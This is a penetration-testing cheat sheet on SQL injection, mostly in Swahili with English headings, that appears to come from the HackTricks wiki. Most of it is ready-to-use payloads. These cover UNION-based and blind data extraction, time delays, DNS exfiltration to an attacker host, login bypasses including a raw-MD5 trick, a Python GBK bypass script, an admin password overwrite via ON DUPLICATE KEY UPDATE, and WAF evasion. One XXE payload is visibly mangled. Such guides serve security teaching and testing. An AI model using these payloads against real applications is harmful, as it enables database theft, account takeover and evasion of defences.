# SQL Injection {{#include ../../banners/hacktricks-training.md}} ## What is SQL injection? An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service. ## Entry point detection When a site appears to be **vulnerable to SQL injection (SQLi)** due to unusual server responses to SQLi-related inputs, the **first step** is to understand how to **inject data into the query without disrupting it**. This requires identifying the method to **escape from the current context** effectively. These are some useful examples: ``` [Nothing] ' " ` ') ") `) ')) ")) `)) ``` Kisha, unahitaji kujua jinsi ya **kurekebisha ombi ili kutokuwepo na makosa**. Ili kurekebisha ombi unaweza **kuingiza** data ili **ombile la awali likubali data mpya**, au unaweza tu **kuingiza** data yako na **kuongeza alama ya maoni mwishoni**. _Kumbuka kwamba ikiwa unaweza kuona ujumbe wa makosa au unaweza kutambua tofauti wakati ombi linafanya kazi na wakati halifanyi kazi hatua hii itakuwa rahisi zaidi._ ### **Maoni** ```sql MySQL #comment -- comment [Note the space after the double dash] /*comment*/ /*! MYSQL Special SQL */ PostgreSQL --comment /*comment*/ MSQL --comment /*comment*/ Oracle --comment SQLite --comment /*comment*/ HQL HQL does not support comments ``` ### Kuithibitisha kwa operesheni za kiakili Njia ya kuaminika ya kuithibitisha udhaifu wa SQL injection inahusisha kutekeleza **operesheni ya kiakili** na kuangalia matokeo yanayotarajiwa. Kwa mfano, parameter ya GET kama `?username=Peter` inayotoa maudhui sawa wakati inabadilishwa kuwa `?username=Peter' or '1'='1` inaashiria udhaifu wa SQL injection. Vivyo hivyo, matumizi ya **operesheni za kihesabu** yanatumika kama mbinu bora ya kuithibitisha. Kwa mfano, ikiwa kufikia `?id=1` na `?id=2-1` kunatoa matokeo sawa, inaashiria SQL injection. Mifano inayoonyesha uthibitisho wa operesheni za kiakili: ``` page.asp?id=1 or 1=1 -- results in true page.asp?id=1' or 1=1 -- results in true page.asp?id=1" or 1=1 -- results in true page.asp?id=1 and 1=2 -- results in false ``` Orodha hii ya maneno iliundwa kujaribu **kuhakikisha SQLinjections** kwa njia iliyoanzishwa: {% file src="../../images/sqli-logic.txt" %} ### Kuangalia kwa Muda Katika baadhi ya matukio **hutaona mabadiliko yoyote** kwenye ukurasa unaojaribu. Hivyo, njia nzuri ya **kuvumbua SQL injections za kipofu** ni kufanya DB ifanye vitendo na itakuwa na **athari kwenye muda** ambao ukurasa unahitaji kupakia.\ Hivyo, tutakuwa tukiongeza kwenye ombi la SQL operesheni ambayo itachukua muda mrefu kukamilisha: ``` MySQL (string concat and logical ops) 1' + sleep(10) 1' and sleep(10) 1' && sleep(10) 1' | sleep(10) PostgreSQL (only support string concat) 1' || pg_sleep(10) MSQL 1' WAITFOR DELAY '0:0:10' Oracle 1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) 1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10) SQLite 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ``` Katika baadhi ya matukio **kazi za usingizi hazitaruhusiwa**. Basi, badala ya kutumia kazi hizo unaweza kufanya uchunguzi **ufanye operesheni ngumu** ambazo zitachukua sekunde kadhaa. _Mifano ya mbinu hizi zitajadiliwa tofauti kwenye kila teknolojia (ikiwa ipo)_. ### Kutambua Nyuma Njia bora ya kutambua nyuma ni kujaribu kutekeleza kazi za nyuma tofauti. Unaweza kutumia _**sleep**_ **functions** za sehemu ya awali au hizi (meza kutoka [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification): ```bash ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"], ["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], ["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"], ["@@CONNECTIONS>0" ,"MSSQL"], ["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"], ["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"], ["USER_ID(1)=USER_ID(1)" ,"MSSQL"], ["ROWNUM=ROWNUM" ,"ORACLE"], ["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"], ["LNNVL(0=123)" ,"ORACLE"], ["5::int=5" ,"POSTGRESQL"], ["5::integer=5" ,"POSTGRESQL"], ["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"], ["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"], ["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"], ["current_database()=current_database()" ,"POSTGRESQL"], ["sqlite_version()=sqlite_version()" ,"SQLITE"], ["last_insert_rowid()>1" ,"SQLITE"], ["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], ["val(cvar(1))=1" ,"MSACCESS"], ["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], ["cdbl(1)=cdbl(1)" ,"MSACCESS"], ["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ``` Pia, ikiwa una ufikiaji wa matokeo ya ombi, unaweza kufanya **kuchapisha toleo la hifadhidata**. > [!NOTE] > Kuendelea tutajadili mbinu tofauti za kutumia aina tofauti za SQL Injection. Tutatumia MySQL kama mfano. ### Kutambua na PortSwigger {{#ref}} https://portswigger.net/web-security/sql-injection/cheat-sheet {{#endref}} ## Kutumia Union Based ### Kugundua idadi ya safu Ikiwa unaweza kuona matokeo ya ombi hili ndilo njia bora ya kulitumia.\ Kwanza kabisa, tunahitaji kugundua **idadi** ya **safu** ambazo **ombio la awali** linarejesha. Hii ni kwa sababu **ombio zote mbili zinapaswa kurejesha idadi sawa ya safu**.\ Mbinu mbili hutumiwa kawaida kwa ajili ya kusudi hili: #### Order/Group by Ili kubaini idadi ya safu katika ombi, ongeza taratibu idadi inayotumika katika **ORDER BY** au **GROUP BY** vifungu hadi jibu la uongo litakapopatikana. Licha ya kazi tofauti za **GROUP BY** na **ORDER BY** ndani ya SQL, zote zinaweza kutumika kwa njia sawa ili kubaini idadi ya safu za ombi. ```sql 1' ORDER BY 1--+ #True 1' ORDER BY 2--+ #True 1' ORDER BY 3--+ #True 1' ORDER BY 4--+ #False - Query is only using 3 columns #-1' UNION SELECT 1,2,3--+ True ``` ```sql 1' GROUP BY 1--+ #True 1' GROUP BY 2--+ #True 1' GROUP BY 3--+ #True 1' GROUP BY 4--+ #False - Query is only using 3 columns #-1' UNION SELECT 1,2,3--+ True ``` #### UNION SELECT Chagua thamani nyingi za null hadi uchunguzi uwe sahihi: ```sql 1' UNION SELECT null-- - Not working 1' UNION SELECT null,null-- - Not working 1' UNION SELECT null,null,null-- - Worked ``` _Unapaswa kutumia `null`values kwani katika baadhi ya kesi aina ya safu za pande zote za swali lazima iwe sawa na null ni halali katika kila kesi._ ### Toa majina ya hifadhidata, majina ya meza na majina ya safu Katika mifano ifuatayo tutapata jina la hifadhidata zote, jina la meza ya hifadhidata, majina ya safu za meza: ```sql #Database names -1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata #Tables of a database -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database] #Column names -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name] ``` _Kuna njia tofauti za kugundua data hii kwenye kila hifadhidata tofauti, lakini daima ni ile ile metodolojia._ ## Kutumia Union Based iliyofichwa Wakati matokeo ya ombi yanaonekana, lakini kuingilia kati kwa msingi wa umoja kunaonekana kuwa haiwezekani, inamaanisha kuwepo kwa **kuingilia kati kwa msingi wa umoja iliyofichwa**. Hali hii mara nyingi inasababisha hali ya kuingilia kati kwa kipofu. Ili kubadilisha kuingilia kati kwa kipofu kuwa ya msingi wa umoja, ombi la utekelezaji kwenye backend linahitaji kutambuliwa. Hii inaweza kufanywa kwa kutumia mbinu za kuingilia kati kwa kipofu pamoja na meza za kawaida maalum kwa Mfumo wa Usimamizi wa Hifadhidata (DBMS) wa lengo lako. Ili kuelewa meza hizi za kawaida, inashauriwa kushauriana na nyaraka za DBMS ya lengo. Mara ombi litakapokuwa limeondolewa, ni muhimu kubadilisha payload yako ili kufunga salama ombi la awali. Kisha, ombi la umoja linaongezwa kwenye payload yako, kuruhusu matumizi ya kuingilia kati kwa msingi wa umoja ambayo sasa inapatikana. Kwa ufahamu zaidi, rejelea makala kamili inayopatikana kwenye [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f). ## Kutumia makosa Ikiwa kwa sababu fulani huwezi kuona **matokeo** ya **ombio** lakini unaweza **kuona ujumbe wa makosa**, unaweza kufanya ujumbe huu wa makosa **kuondoa** data kutoka kwenye hifadhidata.\ Kufuata mtiririko sawa kama katika matumizi ya Union Based unaweza kuweza kutoa DB. ```sql (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ``` ## Kutumia Blind SQLi Katika kesi hii huwezi kuona matokeo ya ombi au makosa, lakini unaweza **kuweza** kutofautisha wakati ombi **linarudisha** jibu **la kweli** au **la uongo** kwa sababu kuna maudhui tofauti kwenye ukurasa.\ Katika kesi hii, unaweza kutumia tabia hiyo kutupa hifadhidata herufi kwa herufi: ```sql ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A' ``` ## Kutumia Makosa ya Blind SQLi Hii ni **hali ile ile kama hapo awali** lakini badala ya kutofautisha kati ya jibu sahihi/kosa kutoka kwa ombi unaweza **kutofautisha kati ya** **kosa** katika ombi la SQL au la (labda kwa sababu seva ya HTTP inashindwa). Hivyo, katika kesi hii unaweza kulazimisha SQLerror kila wakati unapotabiri kwa usahihi herufi: ```sql AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- - ``` ## Kutumia SQLi Inayotegemea Wakati Katika kesi hii **hakuna** njia ya **kutofautisha** **jibu** la ombi kulingana na muktadha wa ukurasa. Lakini, unaweza kufanya ukurasa **uchukue muda mrefu kupakia** ikiwa herufi iliyokisiwa ni sahihi. Tayari tumeshuhudia mbinu hii ikitumika hapo awali ili [kuhakikisha udhaifu wa SQLi](./#confirming-with-timing). ```sql 1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')# ``` ## Stacked Queries Unaweza kutumia stacked queries ili **kutekeleza maswali mengi kwa mfululizo**. Kumbuka kwamba wakati maswali yanayofuata yanatekelezwa, **matokeo** hayarejeshwi kwa programu. Hivyo, mbinu hii inatumika hasa kuhusiana na **vulnerabilities za kipofu** ambapo unaweza kutumia swali la pili kuanzisha utafutaji wa DNS, kosa la masharti, au kuchelewesha muda. **Oracle** haisaidii **stacked queries.** **MySQL, Microsoft** na **PostgreSQL** zinaziunga mkono: `QUERY-1-HERE; QUERY-2-HERE` ## Out of band Exploitation Ikiwa **hakuna njia nyingine** ya unyakuzi **iliyofanya kazi**, unaweza kujaribu kufanya **database** ihamasishwe kupeleka taarifa kwa **mwenyeji wa nje** anayedhibitiwa na wewe. Kwa mfano, kupitia maswali ya DNS: ```sql select load_file(concat('\\\\',version(),'.hacker.site\\a.txt')); ``` ### Kutolewa kwa data nje ya mtandao kupitia XXE ```sql a' UNION SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- - ``` ## Automated Exploitation Angalia [SQLMap Cheatsheet](sqlmap/) ili kutumia udhaifu wa SQLi na [**sqlmap**](https://github.com/sqlmapproject/sqlmap). ## Tech specific info Tumesha jadili njia zote za kutumia udhaifu wa SQL Injection. Pata mbinu zaidi zinazotegemea teknolojia za hifadhidata katika kitabu hiki: - [MS Access](ms-access-sql-injection.md) - [MSSQL](mssql-injection.md) - [MySQL](mysql-injection/) - [Oracle](oracle-injection.md) - [PostgreSQL](postgresql-injection/) Au utaona **mbinu nyingi kuhusu: MySQL, PostgreSQL, Oracle, MSSQL, SQLite na HQL katika** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) ## Authentication bypass Orodha ya kujaribu kupita kazi ya kuingia: {{#ref}} ../login-bypass/sql-login-bypass.md {{#endref}} ### Raw hash authentication Bypass ```sql "SELECT * FROM admin WHERE pass = '".md5($password,true)."'" ``` Hii ombi inaonyesha udhaifu wakati MD5 inatumika na kweli kwa pato la raw katika ukaguzi wa uthibitisho, ikifanya mfumo kuwa hatarini kwa SQL injection. Washambuliaji wanaweza kutumia hii kwa kuunda pembejeo ambazo, zinapohashwa, zinatoa sehemu zisizotarajiwa za amri za SQL, na kusababisha ufikiaji usioidhinishwa. ```sql md5("ffifdyop", true) = 'or'6�]��!r,��b� sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` ### Kupita uthibitisho wa hash uliowekwa ```sql admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' ``` **Orodha iliyo pendekezwa**: Unapaswa kutumia kama jina la mtumiaji kila mstari wa orodha na kama nywila daima: _**Pass1234.**_\ &#xNAN;_(Hizi payloads pia zimejumuishwa katika orodha kubwa iliyotajwa mwanzoni mwa sehemu hii)_ {% file src="../../images/sqli-hashbypass.txt" %} ### GBK Authentication Bypass KAMA ' inakabiliwa unaweza kutumia %A8%27, na wakati ' inakabiliwa itaundwa: 0xA80x5c0x27 (_╘'_) ```sql %A8%27 OR 1=1;-- 2 %8C%A8%27 OR 1=1-- 2 %bf' or 1=1 -- -- ``` Python script: ```python import requests url = "http://example.com/index.php" cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3') datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"} r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url}) print r.text ``` ### Polyglot injection (multicontext) ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` ## Insert Statement ### Badilisha nenosiri la kitu/katumizi kilichopo Ili kufanya hivyo unapaswa kujaribu **kuunda kitu kipya kinachoitwa "kitu mkuu"** (labda **admin** katika kesi ya watumiaji) ukibadilisha kitu: - Unda mtumiaji anayeitwa: **AdMIn** (herufi kubwa na ndogo) - Unda mtumiaji anayeitwa: **admin=** - **SQL Truncation Attack** (wakati kuna aina fulani ya **mipaka ya urefu** katika jina la mtumiaji au barua pepe) --> Unda mtumiaji mwenye jina: **admin \[nafasi nyingi] a** #### SQL Truncation Attack Ikiwa hifadhidata ina udhaifu na idadi ya juu ya herufi kwa jina la mtumiaji ni kwa mfano 30 na unataka kujifanya kuwa mtumiaji **admin**, jaribu kuunda jina la mtumiaji linaloitwa: "_admin \[nafasi 30] a_" na nenosiri lolote. Hifadhidata itafanya **ukaguzi** ikiwa **jina la mtumiaji** lililoingizwa **lipo** ndani ya hifadhidata. Ikiwa **siyo**, itakata **jina la mtumiaji** hadi **idadi ya juu ya herufi inayoruhusiwa** (katika kesi hii hadi: "_admin \[nafasi 25]_") na kisha it **ondoa moja kwa moja nafasi zote mwishoni ikisasisha** ndani ya hifadhidata mtumiaji "**admin**" kwa **nenosiri jipya** (kosa fulani linaweza kuonekana lakini haimaanishi kwamba hii haijafanya kazi). Maelezo zaidi: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref) _Kumbuka: Shambulio hili halitafanya kazi kama ilivyoelezwa hapo juu katika usakinishaji wa hivi karibuni wa MySQL. Ingawa kulinganisha bado kunapuuzilia mbali nafasi za mwisho kwa chaguo-msingi, kujaribu kuingiza mfuatano mrefu zaidi ya urefu wa uwanja kutasababisha kosa, na kuingiza kutashindwa. Kwa maelezo zaidi kuhusu ukaguzi huu:_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation) ### MySQL Wakati wa kuingiza ukaguzi wa msingi Ongeza `','',''` kadri unavyofikiri ili kutoka kwenye taarifa za VALUES. Ikiwa kuchelewesha kutelezwa, una SQLInjection. ```sql name=','');WAITFOR%20DELAY%20'0:0:5'--%20- ``` ### ON DUPLICATE KEY UPDATE The `ON DUPLICATE KEY UPDATE` clause in MySQL inatumika kufafanua hatua za kuchukuliwa na database wakati jaribio linafanywa kuingiza safu ambayo itasababisha thamani ya duplicate katika index ya UNIQUE au PRIMARY KEY. Mfano ufuatao unaonyesha jinsi kipengele hiki kinaweza kutumika kubadilisha nenosiri la akaunti ya msimamizi: Mfano wa Payload Injection: Payload ya kuingiza inaweza kuandaliwa kama ifuatavyo, ambapo safu mbili zinajaribiwa kuingizwa kwenye jedwali la `users`. Safu ya kwanza ni ya kudanganya, na safu ya pili inalenga barua pepe ya msimamizi aliyepo kwa nia ya kubadilisha nenosiri: ```sql INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- "; ``` Hapa kuna jinsi inavyofanya kazi: - Uchunguzi unajaribu kuingiza safu mbili: moja kwa `generic_user@example.com` na nyingine kwa `admin_generic@example.com`. - Ikiwa safu ya `admin_generic@example.com` tayari ipo, kipengele cha `ON DUPLICATE KEY UPDATE` kinachochea, kikimwambia MySQL kuboresha uwanja wa `password` wa safu iliyopo kuwa "bcrypt_hash_of_newpassword". - Kwa hivyo, uthibitishaji unaweza kujaribiwa kwa kutumia `admin_generic@example.com` na nenosiri linalolingana na hash ya bcrypt ("bcrypt_hash_of_newpassword" inawakilisha hash ya bcrypt ya nenosiri jipya, ambayo inapaswa kubadilishwa na hash halisi ya nenosiri linalotakiwa). ### Pata taarifa #### Kuunda akaunti 2 kwa wakati mmoja Unapojaribu kuunda mtumiaji mpya na jina la mtumiaji, nenosiri na barua pepe zinahitajika: ``` SQLi payload: username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- - A new user with username=otherUsername, password=otherPassword, email:FLAG will be created ``` #### Kutumia desimali au hexadecimal Kwa mbinu hii unaweza kutoa taarifa kwa kuunda akaunti 1 tu. Ni muhimu kutambua kwamba huwezi kuandika chochote. Kutumia **hex2dec** na **substr**: ```sql '+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' ``` Ili kupata maandiko unaweza kutumia: ```python __import__('binascii').unhexlify(hex(215573607263)[2:]) ``` Kutumia **hex** na **replace** (na **substr**): ```sql '+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' '+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' #Full ascii uppercase and lowercase replace: '+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' ``` ## Routed SQL injection Routed SQL injection ni hali ambapo swali linaloweza kuingizwa siyo lile linalotoa matokeo bali matokeo ya swali linaloweza kuingizwa yanaenda kwa swali linalotoa matokeo. ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt)) Example: ``` #Hex of: -1' union select login,password from users-- a -1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a ``` ## WAF Bypass [Initial bypasses from here](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass) ### No spaces bypass No Space (%20) - bypass kutumia mbadala za nafasi ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` No Whitespace - kupita kwa kutumia maoni ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` No Whitespace - bypass kutumia mabano ```sql ?id=(1)and(1)=(1)-- ``` ### Hakuna kukatiza bypass Hakuna Comma - bypass kutumia OFFSET, FROM na JOIN ``` LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` ### Generic Bypasses Blacklisting kwa kutumia maneno muhimu - bypass kwa kutumia herufi kubwa/ndogo ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` Blacklist kutumia maneno muhimu yasiyo na tofauti - pitisha kwa kutumia opereta sawa ``` AND -> && -> %26%26 OR -> || -> %7C%7C = -> LIKE,REGEXP,RLIKE, not < and not > > X -> not between 0 and X WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null)) ``` ### Scientific Notation WAF bypass Unaweza kupata maelezo zaidi kuhusu hila hii katika [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/).\ Kimsingi unaweza kutumia noti ya kisayansi kwa njia zisizotarajiwa ili kuipita WAF: ``` -1' or 1.e(1) or '1'='1 -1' or 1337.1337e1 or '1'='1 ' or 1.e('')= ``` ### Bypass Column Names Restriction Kwanza kabisa, zingatia kwamba ikiwa **uchunguzi wa asili na jedwali ambapo unataka kutoa bendera lina idadi sawa ya safu** unaweza tu kufanya: `0 UNION SELECT * FROM flag` Inawezekana **kufikia safu ya tatu ya jedwali bila kutumia jina lake** kwa kutumia uchunguzi kama ifuatavyo: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, hivyo katika sqlinjection hii itakuwa kama: ```bash # This is an example with 3 columns that will extract the column number 3 -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F; ``` Au kutumia **comma bypass**: ```bash # In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select" -1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c ``` Hii hila ilichukuliwa kutoka [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/) ### Zana za kupendekeza WAF bypass {{#ref}} https://github.com/m4ll0k/Atlas {{#endref}} ## Miongozo Mingine - [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) ## Orodha ya Ugunduzi wa Brute-Force {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt {{#endref}} ​ {{#include ../../banners/hacktricks-training.md}}